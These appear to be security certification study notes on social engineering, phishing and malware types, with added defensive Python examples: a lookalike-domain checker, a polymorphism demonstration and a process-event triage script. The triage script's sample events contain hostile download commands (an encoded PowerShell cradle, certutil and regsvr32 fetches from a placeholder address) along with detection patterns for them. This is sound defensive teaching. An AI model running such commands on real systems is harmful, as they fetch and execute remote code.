# Compare and Contrast Social Engineering Techniques
[[Principles of Security]]
## Social Engineering
- AKA hacking the human
- Purposes of social engineering
- Reconnaissance and eliciting information
- Intrusion and gaining unauthorized access
- Many possible scenarios
- Persuade a user to run a malicious file
- Contact a help desk and solicit information
- Gain access to premises and install a monitoring device
- It is important to remember that social engineering can also be face-to-face interactions
## Social Engineering Principles
- Reasons for effectiveness
- Similar to the techniques used by salespeople
- Exploit predictable features of human nature (influence factors)
- Familiarity/liking
- Establish trust
- Make the request seem reasonable and natural
- Consensus/social proof
- Exploit polite behaviors
- Establish spoofed testimonials or contacts
- Authority and intimidation
- Make the target afraid to refuse
- Exploit lack of knowledge or awareness
- Scarcity and urgency
- Rush the target into a decision
## Impersonation and Trust
- Impersonation
- Pretend to be someone else
- Use the persona to charm the target or to intimidate them
- Exploit situations where identity-proofing is difficult
- Pretexting
- Using a scenario with convincing supporting detail
- Trust
- Obtain or spoof data that supports the identity claim
- fake credential
- evidence to make it believable
## Dumpster Diving and Tailgating
- Dumpster diving
- Steal documents and media from trash
- Discarded paperwork and media usually contain information about the company
- Supplies detail that makes a pretext believable, e.g. the name of a contractor currently doing work on site
- Tailgating
- Access premises covertly
- Follow someone else through a door
- Piggybacking
- Access premises without authorization, but with the knowledge (and help) of an employee
- Get someone to hold a door open
- "I forgot my badge"
- A mantrap (two interlocking doors that admit one person at a time) defeats both tailgating and piggybacking
## Identity Fraud and Invoice Scams
- Identity fraud
- Impersonation with convincing detail and stolen or spoofed proofs
- Identity fraud vs identity theft: theft is obtaining a real person's identity details; fraud is using false or stolen proofs to pass as that person (or as an invented one)
- Invoice scams
- Spoofing supplier details to submit invoices with false account details
- Credential theft and misuse
- Credential harvesting
- Shoulder surfing (watching the target type a password or PIN)
- Lunchtime attack (using a workstation left logged in and unattended)
## Phishing, Spear Phishing, Whaling, and Vishing
- Trick target into using a malicious resource
- Spoof legitimate communications and sites
- Phishing: delivered by email with malicious links or attachments, usually in bulk like spam
- Untargeted; relies on some fraction of recipients clicking the link
- **Spear Phishing**
- Highly targeted/tailored attack
- the email will have context relevant to the company/situation
- **Whaling**
- targeting senior management
- **Vishing**
- Using a voice channel to attack
- unsolicited scam phone calls
- **SMiShing**
- Text messaging phishing
## Spam, Hoaxes, and Prepending
- Spam
- Unsolicited email
- Email address harvesting
- Spam over internet messaging (SPIM)
- Hoaxes
- Delivered as spam or malvertising
- Fake A-V to get user to install remote desktop software
- Phone-based scams
- **Prepending**
- Tagging email subject line
- Can be used by a threat actor as a consensus or urgency technique (e.g. "RE:" or "URGENT" in the subject)
- Can be added by mail systems to warn users
## Pharming and Credential Harvesting
- Passive techniques have less risk of detection
- **Pharming**
- Redirection by DNS spoofing
- DNS record manipulation/poisoning
- Typosquatting
- Register cousin domains that closely resemble the real one (a mistyped or visually similar name) rather than redirecting DNS
- Also makes phishing links look more convincing
- Watering Hole
- Target a third-party site the victims already visit and trust
- Physical analogue: socializing with employees at the bar they frequent
- Customer or supplier sites, hobby sites, social media...
- Credential harvesting
- Attacks focused on obtaining credentials for resale rather than for direct intrusion
- Or on obtaining many credentials for a single company
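The typosquatting and cousin-domain points above are easy to state and surprisingly fiddly to check. The following is an added example, not part of the original notes: a small classifier that compares an inbound sender domain against a trusted list and flags one-character typos, transpositions, homoglyph swaps (`rn` for `m`, `1` for `l`), same name under another TLD, and the trusted domain used as a subdomain of an attacker's domain. The trusted list, the homoglyph table and the sample domains are constructed for illustration, and the two-label domain split is an assumption (real code should use the public suffix list).

```python
"""Cousin-domain / typosquat check for inbound sender domains.

Added example, not from the original notes. TRUSTED, HOMOGLYPHS and the
sample inputs are constructed; split_domain() assumes a one-label TLD.
"""
from typing import Optional, Tuple

TRUSTED = ("example.com", "examplebank.com")   # constructed allowlist

# Digraphs and digits that render like another letter in common fonts.
HOMOGLYPHS = (("rn", "m"), ("vv", "w"), ("cl", "d"), ("0", "o"), ("1", "l"))


def fold_homoglyphs(domain: str) -> str:
    for lookalike, real in HOMOGLYPHS:
        domain = domain.replace(lookalike, real)
    return domain


def split_domain(domain: str) -> Tuple[str, str, str]:
    """Return (subdomain, second-level label, tld). Naive: assumes a one-label TLD."""
    labels = domain.split(".")
    if len(labels) < 2:
        return ("", domain, "")
    return (".".join(labels[:-2]), labels[-2], labels[-1])


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insertion, deletion, substitution
    and adjacent transposition ("exmaple") each cost 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def classify(sender_domain: str) -> Tuple[str, Optional[str]]:
    """("trusted", domain), ("lookalike", imitated trusted domain) or ("unknown", None)."""
    raw = sender_domain.strip().lower().rstrip(".")
    _, sld, tld = split_domain(raw)
    if f"{sld}.{tld}" in TRUSTED:            # exact match on the *unfolded* name only
        return ("trusted", f"{sld}.{tld}")
    # Fold homoglyphs only after the exact check: "exarnple.com" must never become trusted.
    sub, sld, tld = split_domain(fold_homoglyphs(raw))
    registrable = f"{sld}.{tld}"
    for trusted in sorted(TRUSTED, key=len, reverse=True):      # longest name first
        t_sld = trusted.split(".")[0]
        if (registrable == trusted                               # differs only by homoglyphs
                or osa_distance(registrable, trusted) <= 1       # one typo / swap / dropped char
                or t_sld in sld                                  # example-secure.com, example.net
                or (sub and trusted in sub)):                    # example.com.login-portal.net
            return ("lookalike", trusted)
    return ("unknown", None)


if __name__ == "__main__":
    for d in ("example.com", "exarnple.com", "exmaple.com", "example.co",
              "examplebank-login.com", "example.com.login-portal.net", "github.com"):
        print(f"{d:32} {classify(d)}")
```

Note the ordering: the exact-match check runs on the raw name and the homoglyph folding happens afterwards, otherwise `exarnple.com` would be folded to `example.com` and promoted to trusted. The substring rule (`t_sld in sld`) is deliberately aggressive and will produce false positives on legitimate names that happen to contain a trusted label; in a mail gateway it should feed a warning banner rather than a block.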
## Influence Campaigns
- Sophisticated threat actors using multiple resources to change opinions on a mass scale
- Soft power
- Leveraging diplomatic and cultural assets
- Hybrid warfare
- Use of espionage, disinformation, and hacking
- Social Media
- use of hacked accounts and bot accounts
- Spread rumor and reinforce messaging
# Analyze Indicators of Malware-Based Attacks
## Malware Classification
- Classified by vector/infection method
- Viruses and worms
- Self-replicating code that spreads without user authorization
- Trojans
- a malicious program concealed within a benign one
- Potentially unwanted programs/applications **(PUPs/PUAs)**
- Pre-installed "bloatware" or installed alongside another app
- Not completely concealed, but the installation may be covert
- Also called grayware
- Classification by payload
## Computer Viruses
- Rely on some sort of host file or media
- Non-resident/file infector
- memory resident
- boot
- script/macro
- Multipartite
- Polymorphic
- Evades signature-based scanners
- Re-encrypts or rewrites itself each time it replicates, so the stored bytes differ from copy to copy
- Vector for delivery
- USB drive, email malicious file/link
![[Pasted image 20230628085221.png]]
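Why polymorphism defeats a byte signature is easier to see by building the mechanism than by describing it. The following is an added example, not part of the original notes and not malware: the "body" is a constructed text string, nothing is ever executed, and `DECODER_STUB` is a placeholder marker that stands in for the real decryption routine a virus would prepend. Each generation XORs the body with a fresh random key, so every copy hashes differently and the body signature never matches, while the decoder (the part that cannot be encrypted) stays constant and the decrypted body is identical every time.

```python
"""Why a body signature fails against polymorphic code.

Added example, not from the original notes and not malware: PAYLOAD is a
constructed string, nothing is executed, and DECODER_STUB is a placeholder
for the constant decryption routine a real polymorphic virus prepends.
"""
import hashlib
import os
from typing import Dict, Optional

PAYLOAD = b"CONSTRUCTED SAMPLE BODY: stands in for the virus code"
BODY_SIGNATURE = b"SAMPLE BODY"          # bytes a scanner might match in the cleartext body
DECODER_STUB = b"\xde\xc0\xde\x01"       # placeholder for the (constant) decoder
KEY_LEN = 4


def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def replicate(payload: bytes, key: Optional[bytes] = None) -> bytes:
    """One generation: stub || key || xor(body, key), with a fresh key each time."""
    while key is None or not any(key):      # a zero key would leave the body in cleartext
        key = os.urandom(KEY_LEN)
    return DECODER_STUB + key + xor_bytes(payload, key)


def decode(sample: bytes) -> bytes:
    """What the stub does at run time: recover the key and decrypt the body."""
    if not sample.startswith(DECODER_STUB):
        raise ValueError("not one of our samples")
    start = len(DECODER_STUB)
    return xor_bytes(sample[start + KEY_LEN:], sample[start:start + KEY_LEN])


def signature_hits(sample: bytes) -> bool:
    """Naive static scan of the stored bytes for the body signature."""
    return BODY_SIGNATURE in sample


def stub_hits(sample: bytes) -> bool:
    """Scan for the part that cannot change: the decoder."""
    return sample.startswith(DECODER_STUB)


def demo(generations: int = 5) -> Dict[str, object]:
    """Replicate a few times and report what each detection approach sees."""
    samples = [replicate(PAYLOAD) for _ in range(generations)]
    return {
        "distinct_hashes": len({hashlib.sha256(s).hexdigest() for s in samples}),
        "body_signature_hits": sum(signature_hits(s) for s in samples),
        "stub_hits": sum(stub_hits(s) for s in samples),
        "all_decode_identically": all(decode(s) == PAYLOAD for s in samples),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:24} {v}")
```

Two things follow from the output: hash blocklists are useless against this class (every generation has a new hash), and the only static handle is the decoder. Real families therefore vary the decoder too (metamorphism), which is why detection moves to emulation, sandbox execution and behaviour, as the later Malware Indicators section describes.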
## Computer Worms and Fileless Malware
- Early computer worms
- Propagate in memory and over network links
- Consume bandwidth and crash processes
- Self replicating
- Fileless malware
- Exploiting remote execution and memory residence to deliver payloads
- May run from an initial script or Trojan
- Persistence via the registry
- Use of shellcode to create backdoors and download additional tools
- "living off the land" exploitation of built-in scripting tools
- Advanced persistent threat (APT)/advanced volatile threat (AVT)/low observable characteristics (LOC)
## Spyware, Adware, and Keyloggers
- Tracking cookies
- Adware (PUP/grayware)
- changes to browser settings
- Spyware (malware)
- Log all local activity
- use of recording devices and screenshots
- Redirection
- Keylogger
- Software and hardware
## Backdoors and Remote Access Trojans
- Backdoor: malware that gives the attacker a way back in without re-exploiting (the original vulnerability may be unreliable, noisy, or patched later)
- Remote access trojan (RAT)
- Bots and botnets
- Command & control servers (C2 or C&C)
- Backdoors from misconfiguration and unauthorized software
## Rootkits
- Local administrator vs SYSTEM/root privileges: a rootkit running as SYSTEM/root (or in the kernel) sits below the tools an administrator uses to inspect the machine
- A rootkit conceals itself from process listings (Task Manager) and from log files
- Replace key system files and utilities
- Purge log files
- firmware rootkits
## Ransomware, Crypto-malware, and Logic Bombs
- Ransomware
- Nuisance: locks the user out by replacing the shell, without encrypting data
- Crypto-malware
- High impact ransomware (encrypt files)
- Cryptomining/cryptojacking
- Hijack resources to mine cryptocurrency
- Logic bombs
![[Pasted image 20230628090014.png]]
## Malware Indicators
- Browser changes or an overt ransomware notification
- Anti-virus notifications
- Endpoint protection platforms and next-gen A-V
- Behavior-based analysis
- Sandbox execution
- Cuckoo
- Resource utilization/consumption
- Task Manager (Windows) and top (Linux)
- File system changes
- Registry
- Temp files
## Process Analysis
- Signature-based detection is failing to identify modern APT-style tools
- Network and host behavior anomalies drive detection methods
- Running process analysis
- Process explorer
- Logging activity
- System monitor
- Network activity
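The fileless malware notes above (remote execution, "living off the land", payloads hidden in an encoded PowerShell command) and this section's point that behaviour anomalies now drive detection both come down to the same practical task: looking at process-creation telemetry for suspicious parent/child pairs and command lines. The following is an added example, not part of the original notes: a small triage routine over constructed, Sysmon-Event-ID-1-style records (parent image, image, command line). The rule set, the Office and script-host lists, the sample events and the 203.0.113.10 address (TEST-NET-3) are assumptions for illustration, not real telemetry. The one non-obvious step is that a `-EncodedCommand` blob is base64-decoded as UTF-16LE and the text rules are run over the decoded script, because that is where the download cradle actually lives.

```python
"""Behaviour-based triage of process-creation events.

Added example, not from the original notes. Events are constructed to
resemble Sysmon Event ID 1 fields; rules, lists and addresses are assumptions.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    parent: str     # ParentImage
    image: str      # Image
    cmdline: str    # CommandLine


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Living-off-the-land patterns: (rule name, regex over the visible or decoded command line).
LOLBIN_RULES = [
    ("download_cradle", re.compile(r"\b(?:IEX|Invoke-Expression|DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)),
    ("certutil_urlcache", re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b", re.I)),
    ("regsvr32_remote_scriptlet", re.compile(r"\bregsvr32(?:\.exe)?\b.*/i:https?://", re.I)),
    ("mshta_inline_or_remote", re.compile(r"\bmshta(?:\.exe)?\s+(?:https?://|vbscript:|javascript:)", re.I)),
    ("rundll32_script_host", re.compile(r"\brundll32(?:\.exe)?\b.*\b(?:javascript|vbscript):", re.I)),
]
# -EncodedCommand and the abbreviations PowerShell accepts, followed by a base64 blob.
ENC_TOKEN = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Tuple[Optional[str], str]:
    """Return (decoded script or None, command line with the base64 blob cut out).
    The blob is removed so the text rules are not run over base64 noise."""
    m = ENC_TOKEN.search(cmdline)
    if not m:
        return None, cmdline
    try:   # PowerShell encodes the script as UTF-16LE before base64
        decoded = base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except (binascii.Error, ValueError):
        decoded = ""
    return decoded, cmdline[:m.start(1)] + cmdline[m.end(1):]


def analyze(ev: ProcEvent) -> List[str]:
    findings = []
    if basename(ev.parent) in OFFICE_APPS and basename(ev.image) in SCRIPT_HOSTS:
        findings.append("office_spawns_script_host")     # macro-style delivery
    decoded, visible = decode_encoded_command(ev.cmdline)
    if decoded is not None:
        findings.append("encoded_powershell")
    for name, rx in LOLBIN_RULES:
        if rx.search(visible):
            findings.append(name)
        if decoded and rx.search(decoded):
            findings.append("decoded:" + name)           # fileless stage hidden inside -enc
    return findings


def severity(findings: List[str]) -> str:
    if "office_spawns_script_host" in findings or any(f.startswith("decoded:") for f in findings):
        return "high"
    return "medium" if findings else "none"


def triage(events: List[ProcEvent]) -> List[Tuple[str, str, List[str]]]:
    out = []
    for ev in events:
        f = analyze(ev)
        if f:
            out.append((basename(ev.image), severity(f), f))
    return out


# Constructed sample events (not real telemetry).
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -NoP -W Hidden -Enc {_ENC}"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\certutil.exe",
              "certutil.exe -urlcache -split -f http://203.0.113.10/t.txt t.txt"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\regsvr32.exe",
              "regsvr32.exe /s /n /u /i:http://203.0.113.10/x.sct scrobj.dll"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),   # routine admin use
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs -p"),
]

if __name__ == "__main__":
    for image, sev, f in triage(SAMPLE_EVENTS):
        print(f"{sev:6} {image:16} {', '.join(f)}")
```

The plain-script PowerShell launch is left alone on purpose: a PowerShell process is not an indicator by itself, and rules that alert on every script host drown the analyst. What makes the first event high severity is the combination the notes describe: an Office parent, a hidden window, and an encoded command that decodes to a download cradle. The regex rules are starting points to be tuned against an environment's own baseline, and the same findings would feed a Sysmon or EDR pipeline rather than a standalone script.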